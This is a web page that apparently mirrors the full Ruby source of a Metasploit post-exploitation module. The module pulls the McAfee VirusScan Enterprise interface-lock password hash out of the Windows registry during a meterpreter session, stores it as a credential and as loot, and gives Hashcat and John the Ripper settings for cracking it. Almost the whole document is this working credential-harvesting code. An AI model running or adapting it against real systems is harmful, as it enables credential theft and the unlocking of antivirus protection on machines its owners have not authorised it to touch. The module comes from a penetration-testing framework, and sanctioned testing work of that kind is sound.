Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb
Views: 11704
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Auxiliary::Report8include Msf::Post::Windows::UserProfiles910VERSION_5 = Rex::Version.new('5.0')11VERSION_6 = Rex::Version.new('6.0')12VERSION_8 = Rex::Version.new('8.0')13VERSION_9 = Rex::Version.new('9.0')1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'McAfee Virus Scan Enterprise Password Hashes Dump',20'Description' => %q{21This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)22used to lock down the user interface. Hashcat supports cracking this type of23hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt24(--hex-salt) of 01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic25format is available for John the Ripper at the referenced URL.26},27'License' => MSF_LICENSE,28'Author' => [29'Mike Manzotti <mike.manzotti[at]dionach.com>', # Metasploit module30'Maurizio inode Agazzini' # original research31],32'References' => [33['URL', 'https://www.dionach.com/blog/disabling-mcafee-on-access-scanning']34],35'Platform' => [ 'win' ],36'SessionTypes' => [ 'meterpreter' ]37)38)39end4041def run42print_status("Looking for McAfee VSE password hashes on #{sysinfo['Computer']} ...")4344vse_keys = enum_vse_keys45if vse_keys.empty?46vprint_error('McAfee VSE not installed or insufficient permissions')47return48end4950hashes_and_versions = extract_hashes_and_versions(vse_keys)51if hashes_and_versions.empty?52vprint_error('No McAfee VSE hashes extracted')53return54end55process_hashes_and_versions(hashes_and_versions)56end5758def enum_vse_keys59vprint_status('Enumerating McAfee VSE installations')60keys = []61[62'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit63'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit64].each do |key|65subkeys = registry_enumkeys(key)66keys << key unless subkeys.nil?67end68keys69end7071def extract_hashes_and_versions(keys)72vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")73hash_map = {}74keys.each do |key|75hash = registry_getvaldata(key, 'UIPEx')76if hash.empty?77vprint_error("No McAfee VSE password hash found in #{key}")78next79end8081version = registry_getvaldata(key, 'szProductVer')82if version.empty?83vprint_error("No McAfee VSE version key found in #{key}")84next85end86hash_map[hash] = Rex::Version.new(version)87end88hash_map89end9091def process_hashes_and_versions(hashes_and_versions)92hashes_and_versions.each do |hash, version|93if version >= VERSION_5 && version < VERSION_694hashtype = 'md5u'95version_name = 'v5'96else97# Base64 decode hash98hash = Rex::Text.to_hex(Rex::Text.decode_base64(hash), '')99hashtype = 'dynamic_1405'100version_name = 'v8'101unless version >= VERSION_8 && version < VERSION_9102print_warning("Unknown McAfee VSE version #{version} - Assuming v8")103end104end105106print_good("McAfee VSE #{version_name} (#{hashtype}) password hash: #{hash}")107108credential_data = {109post_reference_name: refname,110origin_type: :session,111private_type: :nonreplayable_hash,112private_data: hash,113session_id: session_db_id,114jtr_format: hashtype,115workspace_id: myworkspace_id116}117118create_credential(credential_data)119120# Store McAfee password hash as loot121loot_path = store_loot('mcafee.hash', 'text/plain', session, "mcafee:#{hash}", 'mcafee_hashdump.txt', 'McAfee Password Hash')122print_good("McAfee VSE password hash saved in: #{loot_path}")123end124end125end126127128